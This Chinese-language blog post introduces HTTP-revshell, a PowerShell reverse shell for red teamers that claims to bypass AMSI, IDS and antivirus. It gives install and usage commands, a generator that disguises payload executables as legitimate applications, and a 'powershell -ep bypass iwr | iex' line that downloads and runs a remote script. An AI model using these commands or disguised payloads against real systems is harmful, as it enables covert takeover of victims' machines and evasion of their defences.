这篇文章将为大家详细讲解有关HTTP-revshell是什么意思,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
HTTP-revshell是一个能够绕过AMSI的PowerShell代理感知型反向Shell,这款工具转为红队研究人员以及渗透测试人员设计,能够通过HTTP/S协议来给研究人员提供一个反向Shell链接。HTTP-revshell使用了一种隐蔽的数据信道,可以通过Web请求来获取目标设备的控制权,从而绕过类似IDS、IPS和AV之类的安全解决方案。
SSL
代理感知
上传功能
下载功能
错误控制
AMSI绕过
服务器端多会话支持
PowerShell函数自动补全
广大研究人员可以使用下列命令将该项目源码克隆至本地,并完成依赖组件的自动化安装:
git clone https://github.com/3v4Si0N/HTTP-revshell.git cd HTTP-revshell/ pip3 install -r requirements.txt
upload /src/path/file C:\dest\path\file
download C:\src\path\file /dst/path/file
usage: server.py [-h] [--ssl] [--autocomplete] host port Process some integers. positional arguments: host Listen Host port Listen Port optional arguments: -h, --help show this help message and exit --ssl Send traffic over ssl --autocomplete Autocomplete powershell functions
Import-Module .\Invoke-WebRev.ps1 Invoke-WebRev -ip IP -port PORT [-ssl]
服务器端支持同时与客户端建立多个链接,下面给出的菜单中包含三哥基础命令,即sessions、interact和exit:
- sessions --> 显示当前活动会话 - interact --> 与一个会话进行交互,比如说:interact <session_id> - exit --> 关闭应用程序
如需修改会话,可以按下CTRL+D来退出当前会话,此时不会关闭原有会话。
这个脚本可以帮助我们创建一个带有Payload的可执行文件,这个文件是我们使用HTTP-revshell所必须的。工具提供了六个预定义的模板和一个支持自定义的模板。工具生成的Payload会伪装成合法应用程序的图标、产品信息和版权信息等等。除此之外,它们都会在与服务器建立连接之前打开原始的应用程序,并伪装成合法应用程序来执行。
powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"
关于“HTTP-revshell是什么意思”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。